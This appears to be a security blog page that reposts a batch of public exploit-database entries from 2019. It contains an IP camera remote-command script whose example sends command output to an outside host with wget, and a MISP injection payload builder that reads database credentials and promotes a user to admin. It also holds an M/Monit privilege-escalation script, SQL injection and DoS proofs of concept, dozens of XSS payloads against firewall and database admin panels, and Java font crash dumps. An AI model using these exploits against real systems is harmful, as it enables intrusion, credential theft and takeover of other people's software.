===========================================================================================
# Exploit Title: qdPM 9.1 - 'type' XSS Injection
# CVE: CVE-2019-8391.
# Date: 14-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://qdpm.net
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: v9.1
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description:
Free project management tool for small team
qdPM is a free web-based project management tool suitable for a small
team working on multiple projects.
It is fully configurable. You can easy manage Projects, Tasks and People.
Customers interact
using a Ticket System that is integrated into Task management.
===========================================================================================
# POC - XSS
# Parameters : type
# Attack Pattern : tasks_columns_list<script>bKtx(9366)</script>
# GET Request: http://localhost/qdpm/index.php/configuration
===========================================================================================
GET
/qdpm/index.php/configuration?type=tasks_columns_list<script>bKtx(9366)</script>
HTTP/1.1
Referer: http://localhost/qdPM/
Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,
like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863589852
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Master IP CAM 01 Remote Command Execution
# Date: 09-02-2019
# Remote: Yes
# Exploit Authors: Raffaele Sabato
# Contact: https://twitter.com/syrion89
# Vendor: Master IP CAM
# Version: 3.3.4.2103
# CVE: CVE-2019-8387
import sys
import requests
if len(sys.argv) < 3:
print "[-] Usage: python MasterIpCamRCE.py <ip> <cmd>"
print "[-] Example: python MasterIpCamRCE.py 192.168.1.54 'wget http://192.168.1.55:4444/$(id)'"
exit(1)
host = sys.argv[1]
command = sys.argv[2]
page = [
"bconf.cgi",
"ddns_start.cgi",
"getddnsattr.cgi",
"getinetattr.cgi",
"getnettype.cgi",
"getupnp.cgi",
"getwifiattr.cgi",
"getwifistatus.cgi",
"inetconfig.cgi",
"iptest.cgi",
"listwifiap.cgi",
"p2p.cgi",
"paraconf.cgi",
"scanwifi.cgi",
"setadslattr.cgi",
"setddnsattr.cgi",
"setinetattr.cgi",
"setwifiattr.cgi",
"upnp_start.cgi",
"wifimode.cgi",
"wifitest.cgi",
]
for x in page:
url = "http://"+host+"/cgi-bin/"+x+"?cmd=`"+command+"`"
#url = "http://"+host+"/cgi-bin/"+x+"?action=`"+command+"`"
print "[*] Attack on "+x
print "[+] Sending the payload"
r = requests.get(url)
if r.status_code == 200:
print "[+] Exploit Success"
break
# Exploit Title: CMSsite 1.0 - 'post' SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 17, 2019
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
# Vulnerable File: post.php
# Vulnerable Parameter : post
if (isset($_GET['post'])) {
$post = $_GET['post'];
}
$query = "SELECT * FROM posts WHERE post_id=$post";
$run_query = mysqli_query($con, $query);
# Payload: http://localhost/CMSsite/post.php?post=1%20and%20(sleep(10))
# -*- coding: utf-8 -*-
# Exploit Title: NBMonitor 1.6.5 - 'Key' Denial of Service (PoC)
# Date: 15/02/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.nsauditor.com/
# Software Link: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
# Version: 1.6.5.0
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script "NBMonitor.py", it will create a new file "PoC.txt"
# 2.- Copy the text from the generated PoC.txt file to clipboard
# 3.- Open NBMonitor.exe
# 4.- Go to Register > Enter Registration Code...
# 5.- Write anything in 'Name' field
# 6.- Paste clipboard in 'Key' field
# 7.- Click on button -> Ok
# 8.- Crashed
buffer = "\x41" * 256
f = open ("PoC.txt", "w")
f.write(buffer)
f.close()
#-*-coding:utf-8-*-
#
# Exploit Title: SQL command execution via command injection in STIX module
# Date: 2019-17-02
# Exploit Author: Tm9jdGlz
# Vendor Homepage: https://www.misp-project.org/
# Software link: https://www.misp-project.org/download/
# Version: 2.4.90 - 2.4.99
# Tested on: 2.4.97
# CVE: CVE-2018-19908
#
# Use this payload as stix filename
def encode_data(data):
from base64 import b64encode
from urllib.parse import quote_plus
b64Data = b64encode(data.encode("utf-8"))
urlEncode = quote_plus(b64Data)
return urlEncode
def generate_payload(SQLRequest):
payload = 'MISPPath="../../";'\
'MISPPDB="$MISPPath/app/Config/database.php";'\
'MySQLUUser=$(grep -o -P "(?<=\'login\' => \').*(?=\')" $MISPPDB);'\
'MySQLRUser=${{MySQLRUser:-$MySQLUUser}};'\
'MySQLUPass=$(grep -o -P "(?<=\'password\' => \').*(?=\')" $MISPPDB);'\
'MySQLRPass=${{MySQLRPass:-$MySQLUPass}};'\
'MISPDB=$(grep -o -P "(?<=\'database\' => \').*(?=\')" $MISPPDB);'\
'mysql -u $MySQLRUser -p$MySQLRPass $MISPDB -e "{}"'
return payload.format(SQLRequest)
def generate_exploit(SQLRequest, **kwargs):
options = {
"inputFile" : kwargs.get("input_file", "data"),
"outputFile" : kwargs.get("output_file", "data2"),
"payload" : encode_data(generate_payload(SQLRequest))
}
exploit = "; echo '{payload}'>{inputFile};"\
"python3 -c 'import urllib.parse;"\
'fd=open(\\"{outputFile}\\",\\"w\\");'\
'fd.write(urllib.parse.unquote_plus(open(\\"{inputFile}\\").read()));'\
"fd.close()';"\
"base64 -d {outputFile}>{inputFile};"\
"sh {inputFile};"\
"rm {inputFile} {outputFile} #".format(**options)
return exploit
def main():
SQLRequest = "UPDATE users SET role_id=1 WHERE id = 2"
print(generate_exploit(SQLRequest))
if __name__ == "__main__":
main()
#!/usr/env/python3
"""
Vulnerability title: M/Monit <= 3.7.2 - Privilege Escalation
Author: Dolev Farhi
Vulnerable version: 2.0.151021
Link: https://mmonit.com
Date: 2/17/2019
"""
import sys
import requests
MMONIT_URL = 'http://ip.add.re.ss:8080'
MMONIT_USER = 'monit' # Default built in unprivileged user
MMONIT_PASS = 'monit'
s = requests.Session()
s.get(MMONIT_URL + '/')
resp = s.post(MMONIT_URL + '/z_security_check', params={'z_username':MMONIT_USER,'z_password':MMONIT_PASS})
if 'Invalid username and/or password' in resp.text:
print('Error logging in')
sys.exit(1)
zessionid = s.cookies.get_dict()['zsessionid']
headers = {
'CSRFToken':zessionid,
}
resp = s.post(MMONIT_URL + '/admin/users/update',
headers=headers,
params={'CSRFTOKEN':zessionid,
'fullname':'john doe',
'password':MMONIT_USER,
'title':'',
'email':'',
'phone':'',
'mobile':'',
'imname':'',
'uname':MMONIT_PASS,
'imtype':None,
'admin':'on',
'oldpassword':'D9CFD4AF77E33817DE2160E0C1C7607C'
})
if resp.status_code == 200:
print('Success! You are now M/Monit admin')
else:
print('Something went wrong')
===========================================================================================
# Exploit Title: Webiness Inventory 2.3 - 'ProductModel' Arbitrary File Upload
# Dork: N/A
# Date: 10-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/webinessinventory/files/
# Software Link: https://sourceforge.net/projects/webinessinventory/files/
# Version: 2.3
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: CVE-2019-8404
# Software Description: Small stock inventory managment application for web.
===========================================================================================
# POC:
# Sign in to admin panel. then go to the inventory tab.
Switch to the products tab and create a new product.
In product image, click the browse button and select a file.
https://i.hizliresim.com/OvrOOn.jpg
When you save the product, the script is loaded with the error file to
the server.
for example service unvailable
https://i.hizliresim.com/zjGqD4.jpg
path to the file we uploaded
https://i.hizliresim.com/XMbpp5.jpg
# http://localhost/[PATH]/runtime/ProductModel/[FILE]
===========================================================================================
##################################################################################################################################
# Exploit Title: Comodo Dome Firewall 2.7.0 | Cross-Site Scripting
# Date: 18.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://cdome.comodo.com/firewall/
# Software Link: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278
# Version: 2.7.0
##################################################################################################################################
Introduction
Comodo Dome Firewall (DFW) provides comprehensive security for enterprise
networks. The firewall software can be installed on a physical system or a
virtual machine.
Dome Firewall simplifies the overall management of network security by
delivering a single interface through which administrators can control
firewall policy, antivirus, intrusion prevention, website filtering,
traffic monitoring, VPN and proxy servers. Dome Firewall also features
highly configurable notifications, in-depth reporting and an informative
dashboard which offers a panoramic view of all major settings and network
events.
#################################################################################
XSS details: Reflected & Stored
#################################################################################
XSS1 | Reflected
URL
https://192.168.2.200:10443/korugan/login
METHOD
Post
PARAMETER
username
PAYLOAD
"><script>alert(1)</script>
#################################################################################
XSS2 | Stored
URL
https://192.168.2.200:10443/korugan/admin_profiles
METHOD
Post
PARAMETER
comment
PAYLOAD
<script>alert(2)</script>
#################################################################################
XSS3 | Stored
URL
https://192.168.2.200:10443/korugan/admins
METHOD
Post
PARAMETER
admin_name
PAYLOAD
<script>alert(3)</script>
#################################################################################
XSS4 | Stored
URL
https://192.168.2.200:10443/korugan/admins
METHOD
Post
PARAMETER
name
PAYLOAD
<script>alert(4)</script>
#################################################################################
XSS5 | Stored
URL
https://192.168.2.200:10443/korugan/admins
METHOD
Post
PARAMETER
surname
PAYLOAD
<script>alert(5)</script>
#################################################################################
XSS6 | Stored
URL
https://192.168.2.200:10443/korugan/license_activation
METHOD
Post
PARAMETER
newLicense
PAYLOAD
<script>alert(6)</script>
#################################################################################
XSS7 | Reflected
URL
https://192.168.2.200:10443/korugan/cmclient
METHOD
Post
PARAMETER
organization
PAYLOAD
"><script>alert(7)</script>
#################################################################################
XSS8 | Reflected
URL
https://192.168.2.200:10443/korugan/backupschedule
METHOD
Post
PARAMETER
BACKUP_RCPTTO
PAYLOAD
<script>alert(8)</script>
#################################################################################
XSS9 | Reflected
URL
https://192.168.2.200:10443/korugan/netwizard2
METHOD
Post
PARAMETER
netmask_addr
PAYLOAD
<script>alert(9)</script>
#################################################################################
XSS10 | Reflected
URL
https://192.168.2.200:10443/korugan/routing
METHOD
Post
PARAMETER
destination
PAYLOAD
<script>alert(10)</script>
#################################################################################
XSS11 | Reflected
URL
https://192.168.2.200:10443/korugan/policy_routing#createrule
METHOD
Post
PARAMETER
source
PAYLOAD
<script>alert(11)</script>
#################################################################################
XSS12 | Reflected
URL
https://192.168.2.200:10443/korugan/policy_routing#createrule
METHOD
Post
PARAMETER
destination
PAYLOAD
<script>alert(12)</script>
#################################################################################
XSS13 | Reflected
URL
https://192.168.2.200:10443/korugan/dhcp
METHOD
Post
PARAMETER
GATEWAY_GREEN
PAYLOAD
<script>alert(13)</script>
#################################################################################
XSS14 | Reflected
URL
https://192.168.2.200:10443/korugan/time
METHOD
Post
PARAMETER
NTP_SERVER_LIST
PAYLOAD
<script>alert(14)</script>
#################################################################################
XSS15 | Reflected
URL
https://192.168.2.200:10443/manage/ips/rules/?ACTION=policy&CONTROLLERNAME=&ID=%3Cscript%3Ealert(15)%3C/script%3E&policy=drop
METHOD
Get
PARAMETER
ID
PAYLOAD
<script>alert(15)</script>
#################################################################################
XSS16 | Reflected
URL
https://192.168.2.200:10443/manage/ips/appid/?ACTION=enable&CONTROLLERNAME=&ID=%3Cscript%3Ealert(16)%3C/script%3E&enabled=off
METHOD
Get
PARAMETER
ID
PAYLOAD
<script>alert(16)</script>
#################################################################################
XSS17 | Reflected
URL
https://192.168.2.200:10443/korugan/hotspot_permanent_users
METHOD
Post
PARAMETER
MACADDRESSES
PAYLOAD
<script>alert(17)</script>
#################################################################################
XSS18 | Reflected
URL
https://192.168.2.200:10443/manage/qos/devices/
METHOD
Post
PARAMETER
device
PAYLOAD
<script>alert(18)</script>
#################################################################################
XSS19 | Reflected
URL
https://192.168.2.200:10443/manage/qos/rules/
METHOD
Post
PARAMETER
protocol
PAYLOAD
<script>alert(19)</script>
#################################################################################
XSS20 | Reflected
URL
https://192.168.2.200:10443/korugan/fwgroups
METHOD
Post
PARAMETER
FWADDRESSES
PAYLOAD
<script>alert(20)</script>
#################################################################################
XSS21 | Stored
URL
https://192.168.2.200:10443/korugan/schedule
METHOD
Post
PARAMETER
SCHNAME
PAYLOAD
<script>alert(21)</script>
#################################################################################
XSS22 | Reflected
URL
https://192.168.2.200:10443/korugan/snat
METHOD
Post
PARAMETER
port
PAYLOAD
<script>alert(22)</script>
#################################################################################
XSS23 | Reflected
URL
https://192.168.2.200:10443/korugan/snat
METHOD
Post
PARAMETER
snat_to_ip
PAYLOAD
<script>alert(23)</script>
#################################################################################
XSS24 | Reflected
URL
https://192.168.2.200:10443/korugan/policyfw
METHOD
Post
PARAMETER
mac
PAYLOAD
<script>alert(24)</script>
#################################################################################
XSS25 | Reflected
URL
https://192.168.2.200:10443/korugan/policyfw
METHOD
Post
PARAMETER
target
PAYLOAD
<script>alert(25)</script>
#################################################################################
XSS26 | Stored
URL
https://192.168.2.200:10443/korugan/policyfw
METHOD
Post
PARAMETER
remark
PAYLOAD
<script>alert(26)</script>
#################################################################################
XSS27 | Reflected
URL
https://192.168.2.200:10443/korugan/vpnfw
METHOD
Post
PARAMETER
target
PAYLOAD
<script>alert(27)</script>
#################################################################################
XSS28 | Stored
URL
https://192.168.2.200:10443/korugan/vpnfw
METHOD
Post
PARAMETER
remark
PAYLOAD
<script>alert(28)</script>
#################################################################################
XSS29 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
PROXY_PORT
PAYLOAD
<script>alert(29)</script>
#################################################################################
XSS30 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
VISIBLE_HOSTNAME
PAYLOAD
<script>alert(30)</script>
#################################################################################
XSS31 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
ADMIN_MAIL_ADDRESS
PAYLOAD
<script>alert(31)</script>
#################################################################################
XSS32 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
CACHE_MEM
PAYLOAD
<script>alert(32)</script>
#################################################################################
XSS33 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
MAX_SIZE
PAYLOAD
<script>alert(33)</script>
#################################################################################
XSS34 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
MIN_SIZE
PAYLOAD
<script>alert(34)</script>
#################################################################################
XSS35 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
DST_NOCACHE
PAYLOAD
<script>alert(35)</script>
#################################################################################
XSS36 | Reflected
URL
https://192.168.2.200:10443/korugan/https_exceptions
METHOD
Post
PARAMETER
EXCEPTIONSITELIST
PAYLOAD
<script>alert(36)</script>
#################################################################################
XSS37 | Reflected
URL
https://192.168.2.200:10443/korugan/smtpconfig
METHOD
Post
PARAMETER
VIRUS_ADMIN
PAYLOAD
<script>alert(37)</script>
#################################################################################
XSS38 | Reflected
URL
https://192.168.2.200:10443/korugan/dnsmasq
METHOD
Post
PARAMETER
TRANSPARENT_SOURCE_BYPASS
PAYLOAD
<script>alert(38)</script>
#################################################################################
XSS39 | Reflected
URL
https://192.168.2.200:10443/korugan/dnsmasq
METHOD
Post
PARAMETER
TRANSPARENT_DESTINATION_BYPASS
PAYLOAD
<script>alert(39)</script>
#################################################################################
XSS40 | Reflected
URL
https://192.168.2.200:10443/korugan/antispyware
METHOD
Post
PARAMETER
DNSMASQ_WHITELIST
PAYLOAD
<script>alert(40)</script>
#################################################################################
XSS41 | Reflected
URL
https://192.168.2.200:10443/korugan/antispyware
METHOD
Post
PARAMETER
DNSMASQ_BLACKLIST
PAYLOAD
<script>alert(41)</script>
#################################################################################
XSS42 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
username
PAYLOAD
<script>alert(42)</script>
#################################################################################
XSS43 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
remotenets
PAYLOAD
<script>alert(43)</script>
#################################################################################
XSS44 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
explicitroutes
PAYLOAD
<script>alert(44)</script>
#################################################################################
XSS45 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
static_ip
PAYLOAD
<script>alert(45)</script>
#################################################################################
XSS46 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
custom_dns
PAYLOAD
<script>alert(46)</script>
#################################################################################
XSS47 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
custom_domain
PAYLOAD
<script>alert(47)</script>
#################################################################################
XSS48 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_advanced
METHOD
Post
PARAMETER
GLOBAL_NETWORKS
PAYLOAD
<script>alert(48)</script>
#################################################################################
XSS49 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_advanced
METHOD
Post
PARAMETER
GLOBAL_DNS
PAYLOAD
<script>alert(49)</script>
#################################################################################
XSS50 | Reflected
URL
https://192.168.2.200:10443/korugan/vpn_users
METHOD
Post
PARAMETER
username
PAYLOAD
<script>alert(50)</script>
#################################################################################
##################################################################################################################################
# Exploit Title: ArangoDB Community Edition 3.4.2-1 | Cross-Site Scripting
# Date: 17.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.arangodb.com
# Software Link: https://www.arangodb.com/download-major/
# Version: 3.4.2-1
##################################################################################################################################
Introduction
ArangoDB is a native multi-model, open-source database with flexible data
models for documents, graphs, and key-values. Build high performance
applications using a convenient SQL-like query language or JavaScript
extensions. Use ACID transactions if you require them. Scale horizontally
and vertically with a few mouse clicks.
#################################################################################
XSS details: DOM Based & Reflected & Stored
#################################################################################
XSS1 | DOM Based XSS - Search
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#views
PAYLOAD
"><script>alert(1)</script>
<div class="search-field">
<input type="text" value=""><script>alert(1)</script>"
id="viewsSearchInput" class="search-input" placeholder="Search..."/>
<i id="viewsSearchSubmit" class="fa fa-search"></i>
</div>
#################################################################################
XSS2 | Reflected & Stored - Save as
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#queries
http://127.0.0.1:8529/_db/_system/_api/user/root
METHOD
PATCH
PARAMETER
name
PAYLOAD
"><script>alert(2)</script>
#################################################################################
XSS3 | Stored - Delete query
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#queries
http://127.0.0.1:8529/_db/_system/_api/user/root
METHOD
Get
#################################################################################
XSS3 | Reflected & Stored - Add User
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#users
http://127.0.0.1:8529/_db/_system/_api/user
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#user/%22%3E%3Cscript%3Ealert(3)%3C%2Fscript%3E
METHOD
Post
PARAMETER
user,name
PAYLOAD
"><script>alert(3)</script>
"><script>alert(4)</script>
#################################################################################
XSS5 | DOM Based XSS - Search
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#users
PAYLOAD
"><script>alert(5)</script>
<div class="search-field">
<input type="text" value=""><script>alert(5)</script>"
id="userManagementSearchInput" class="search-input"
placeholder="Search..."/>
<!-- <img id="userManagementSearchSubmit" class="search-submit-icon">
-->
<i id="userManagementSearchSubmit" class="fa fa-search"></i>
</div>
#################################################################################
XSS6 | DOM Based XSS - Search
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#databases
PAYLOAD
"><script>alert(6)</script>
<div class="search-field">
<input type="text" value=""><script>alert(6)</script>"
id="databaseSearchInput" class="search-input" placeholder="Search..."/>
<!-- <img id="databaseSearchSubmit" class="search-submit-icon">-->
<i id="databaseSearchSubmit" class="fa fa-search"></i>
</div>
#################################################################################
##################################################################################################################################
# Exploit Title: Apache CouchDB 2.3.0 | Cross-Site Scripting
# Date: 17.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://couchdb.apache.org
# Software Link: http://couchdb.apache.org/#download
# Version: 2.3.0
##################################################################################################################################
Introduction
A CouchDB server hosts named databases, which store documents. Each
document is uniquely named in the database, and CouchDB provides a RESTful
HTTP API for reading and updating (add, edit, delete) database documents.
#################################################################################
XSS details: DOM Based & Reflected & Stored
#################################################################################
XSS1 | DOM Based - Create Database
URL
http://127.0.0.1:5984/_utils/#/_all_dbs
PAYLOAD
<img src=x onerror=alert(1)>
<input id="js-new-database-name" type="text" class="input-xxlarge"
placeholder="Name of database" value="<img src=x onerror=alert(1)>">
#################################################################################
XSS2 | DOM Based & Stored - Add Option
URL
http://127.0.0.1:5984/_utils/#_config/couchdb@localhost
http://127.0.0.1:5984/_node/couchdb@localhost/_config/1/%3Cimg%20src%3Dx%20onerror%3Dalert(2)%3E
METHOD
Put
PAYLOAD
<img src=x onerror=alert(2)>
<input class="input-option-name" type="text" name="name" placeholder="Name">
#################################################################################
XSS3 | DOM Based & Stored - Delete Option
URL
http://127.0.0.1:5984/_utils/#_config/couchdb@localhost
http://127.0.0.1:5984/_node/couchdb@localhost/_config/1/%3Cimg%20src%3Dx%20onerror%3Dalert(2)%3E
METHOD
Delete
PAYLOAD
<img src=x onerror=alert(2)>
#################################################################################
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of OpenType fonts. It manifests itself in the form of the following crash (with AFL's libdislocator):
--- cut ---
gdb$ c
Continuing.
Iteration (0,0)
Thread 2 "java" received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x6d1a
RBX: 0x7fffb5d94f48 --> 0x7fffb6319f00 --> 0x53ab1500ff
RCX: 0xffffffffffff0000
RDX: 0x7fff28fbdfe6 --> 0x2a001d00100003
RSI: 0x7fff28fadfe8 --> 0x1e001100040000
[...]
[-------------------------------------code-------------------------------------]
0x7fffb6395564 <glyph_CloseContour+148>: mov rsi,QWORD PTR [rbx+0x20]
0x7fffb6395568 <glyph_CloseContour+152>: add rcx,rcx
0x7fffb639556b <glyph_CloseContour+155>: lea rdi,[rdx+rcx*1-0x2]
=> 0x7fffb6395570 <glyph_CloseContour+160>: movsx rsi,WORD PTR [rsi+rcx*1-0x2]
0x7fffb6395576 <glyph_CloseContour+166>: mov rdx,QWORD PTR [rbx+0x30]
0x7fffb639557a <glyph_CloseContour+170>: movsx rcx,WORD PTR [rdi]
0x7fffb639557e <glyph_CloseContour+174>: movzx r8d,WORD PTR [rdx+rcx*2]
0x7fffb6395583 <glyph_CloseContour+179>: cmp WORD PTR [rdx+rsi*2],r8w
[...]
Stopped reason: SIGSEGV
0x00007fffb6395570 in glyph_CloseContour () from jre/8u202/lib/amd64/libt2k.so
gdb-peda$ where
#0 0x00007fffb6395570 in glyph_CloseContour () from jre/8u202/lib/amd64/libt2k.so
#1 0x00007fffb63ad71c in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#2 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#3 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#4 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#5 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#6 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#7 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#8 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#9 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#10 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#11 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#12 0x00007fffb63b469c in tsi_T2GetGlyphByIndex () from jre/8u202/lib/amd64/libt2k.so
#13 0x00007fffb63b5655 in tsi_NewCFFClass () from jre/8u202/lib/amd64/libt2k.so
#14 0x00007fffb63c73c8 in New_sfntClassLogical () from jre/8u202/lib/amd64/libt2k.so
#15 0x00007fffb63a43e3 in Java_sun_font_T2KFontScaler_initNativeScaler () from jre/8u202/lib/amd64/libt2k.so
#16 0x00007fffe5e376c7 in ?? ()
#17 0x00007fff0003ccc0 in ?? ()
#18 0x0000000000000000 in ?? ()
--- cut ---
The crash reproduces on both Windows and Linux platforms. On Windows, the crash can be observed with PageHeap enabled for the java.exe process:
--- cut ---
(5f34.5d1c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
t2k+0xfbec:
00007ffa`0b4cfbec 4e0fbf4c50fe movsx r9,word ptr [rax+r10*2-2] ds:00000000`39c44ffe=????
0:004> k
# Child-SP RetAddr Call Site
00 00000000`0d82de70 00007ffa`0b4e0c0d t2k+0xfbec
01 00000000`0d82dea0 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x5305
02 00000000`0d82df20 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
03 00000000`0d82dfa0 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
04 00000000`0d82e020 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
05 00000000`0d82e0a0 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
06 00000000`0d82e120 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
07 00000000`0d82e1a0 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
08 00000000`0d82e220 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
09 00000000`0d82e2a0 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
0a 00000000`0d82e320 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
0b 00000000`0d82e3a0 00007ffa`0b4e3dd1 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
0c 00000000`0d82e420 00007ffa`0b4e4108 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x84c9
0d 00000000`0d82e460 00007ffa`0b4e47e4 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x8800
0e 00000000`0d82e4b0 00007ffa`0b4f07c5 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x8edc
0f 00000000`0d82e500 00007ffa`0b4f0b11 t2k!Java_sun_font_T2KFontScaler_getGlyphVectorOutlineNative+0x72c9
10 00000000`0d82e560 00007ffa`0b4d9ef6 t2k!Java_sun_font_T2KFontScaler_getGlyphVectorOutlineNative+0x7615
11 00000000`0d82e5e0 00000000`0f928d27 t2k!Java_sun_font_T2KFontScaler_initNativeScaler+0x2c2
12 00000000`0d82e650 00000000`2ad8f228 0xf928d27
13 00000000`0d82e658 00000000`b0063339 0x2ad8f228
14 00000000`0d82e660 00000000`0d82e730 0xb0063339
15 00000000`0d82e668 00000000`b006f271 0xd82e730
16 00000000`0d82e670 00000000`00000000 0xb006f271
0:004> ? rax
Evaluate expression: 969232384 = 00000000`39c55000
0:004> ? r10
Evaluate expression: -32768 = ffffffff`ffff8000
--- cut ---
Attached with this report are three mutated testcases, and a simple Java program used to reproduce the vulnerability by loading OpenType fonts specified through a command-line parameter.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46409.zip
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash:
--- cut ---
$ bin/java -cp . DisplaySfntFont test.ttf
Iteration (0,0)
Iteration (0,1)
Iteration (0,2)
Iteration (0,3)
Iteration (0,4)
#
# A fatal error has been detected by the Java Runtime Environment:
#
# SIGSEGV (0xb) at pc=0x00007fbaa11694c8, pid=19540, tid=0x00007fbac4f18700
#
# JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08)
# Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops)
# Problematic frame:
# C [libfontmanager.so+0x284c8] OpenTypeLayoutEngine::adjustGlyphPositions(unsigned short const*, int, int, char, LEGlyphStorage&, LEErrorCode&)+0x268
#
# Failed to write core dump. Core dumps have been disabled. To enable core dumping, try "ulimit -c unlimited" before starting Java again
#
# An error report file with more information is saved as:
# jre/8u202/hs_err_pid19540.log
#
# If you would like to submit a bug report, please visit:
# http://bugreport.java.com/bugreport/crash.jsp
# The crash happened outside the Java Virtual Machine in native code.
# See problematic frame for where to report the bug.
#
Aborted
--- cut ---
Under gdb, we can find out that the OpenTypeLayoutEngine::adjustGlyphPositions function attempts to access an invalid memory region:
--- cut ---
gdb-peda$ c
Continuing.
Iteration (0,0)
Iteration (0,1)
Iteration (0,2)
Iteration (0,3)
Iteration (0,4)
Thread 2 "java" received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
